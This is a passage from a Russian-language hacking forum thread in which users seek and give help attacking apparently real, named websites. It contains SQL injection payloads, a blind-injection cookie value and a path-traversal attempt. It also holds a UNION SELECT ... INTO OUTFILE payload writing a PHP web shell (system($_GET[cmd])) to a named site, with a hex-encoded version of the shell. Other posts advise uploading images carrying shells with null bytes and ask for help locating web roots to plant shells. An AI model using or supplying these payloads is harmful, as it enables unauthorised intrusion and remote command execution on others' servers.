Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Не прокатывает.

    PHP:
    SELECT FROM users WHERE link 'admin'+and+1='1'
    You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near 'and+1='1'' at line 1
     
  2. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    PHP:
    SELECT FROM users WHERE link 'admin' and '1'=(кавычка)1
    попробуй так ещё
     
    1 person likes this.
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Byrger, не поверишь!
    Я писал пост так:
    Но вывелось:
    PHP:
    SELECT FROM users WHERE link 'admin' and '1'='1
    Кавычка пропала, баг форума... Юзай:
    Code:
    SELECT * FROM users WHERE link = 'admin' and '1'='1
     
  4. anonym_di

    anonym_di Member

    Joined:
    21 Jan 2012
    Messages:
    55
    Likes Received:
    7
    Reputations:
    0
    Народ буду благодарен тому кто мне подскажет как можно обойти вот это
    Code:
    http://www.mk.gov.kz/?lang=kaz&id_open_rubric=469
     
  5. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Прочитай мой пост, я так и попробовал...
    и '1'='1
    и 1='1
     
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Ссылку в студио!
     
  7. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    71
    Likes Received:
    20
    Reputations:
    1
    где можно скачать исходники этого движка? или купить.
    кстате что за двиг rangehoodsupply.com
     
  8. Gaben7

    Gaben7 Member

    Joined:
    8 Jan 2012
    Messages:
    129
    Likes Received:
    9
    Reputations:
    6
    www.xxxxx.com/watch/922/ashot/

    Blind SQL Injection

    Attack details
    Cookie input RNLBSERVERID was set to -1" or "49"="49
    подскажите с чего начать
     
    #19968 Gaben7, 28 Mar 2012
    Last edited: 28 Mar 2012
  9. nikaw87

    nikaw87 New Member

    Joined:
    14 Jul 2011
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Вопрос такой... Имеется файл который отвечает за вывод картинки, /resize.php?act=gif&image=../../ххх/хх/34.png , из него что то дельное можно выжать? или бесполезно? таким образом только картинки вытягивает...
     
  10. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    525
    Reputations:
    173
    Заливаешь картинку с шелом, и таким же образом вытягиваешь, если чё нул байт
     
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Название скрипта подозрительное. Думаю кроме раскрытия путей ничего не получишь.
    OxoTnik,
    я не думаю, что картинки инклудят.
     
  12. nikaw87

    nikaw87 New Member

    Joined:
    14 Jul 2011
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Заливал... также тянул-просто черное изображение( жаль...
     
  13. nikaw87

    nikaw87 New Member

    Joined:
    14 Jul 2011
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Говорю же- только картинки... пробовал достать банально robots.txt, ноль эффекта... решил спросить, может обходные пути есть
     
  14. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    Помогите залить шелл,пробовал так,не получаутся
    http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'<? system($_GET[cmd]); ?>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+into+outfile+'/var/www/html/PHPscripts/a.html'--
     
  15. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    А так и не получится. Ибо или magic_quotes On либо слеширование вида use near '\'test\',5,6,7. Как минимум ищите скрипты где не происходит слеширование (используются не GPC массивы и тп) и поиск phpmyadmin


    PS. Прежде чем делать что-либо , потрудитесь изучить теорию хотябы в минимуме. Изза слеширования вставляются доп символы в sql запрос и он становится некорректным
     
    #19975 Cennarios, 28 Mar 2012
    Last edited: 28 Mar 2012
  16. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    попробуй перевести в HEX <? system($_GET[cmd]); ?>
    получится так
    Code:
    0x3c3f2073797374656d28245f4745545b636d645d293b203f3e
    хотя не получится
     
    #19976 Faaax, 28 Mar 2012
    Last edited: 28 Mar 2012
  17. GaMeSTeR

    GaMeSTeR Banned

    Joined:
    3 Dec 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
    В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
     
  18. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    здесь экстрасенсов нету,сылку в студию
     
  19. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    А можно ли через файл.css залить шелл?
     
  20. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    [​IMG]
     
    2 people like this.
Loading...
Thread Status:
Not open for further replies.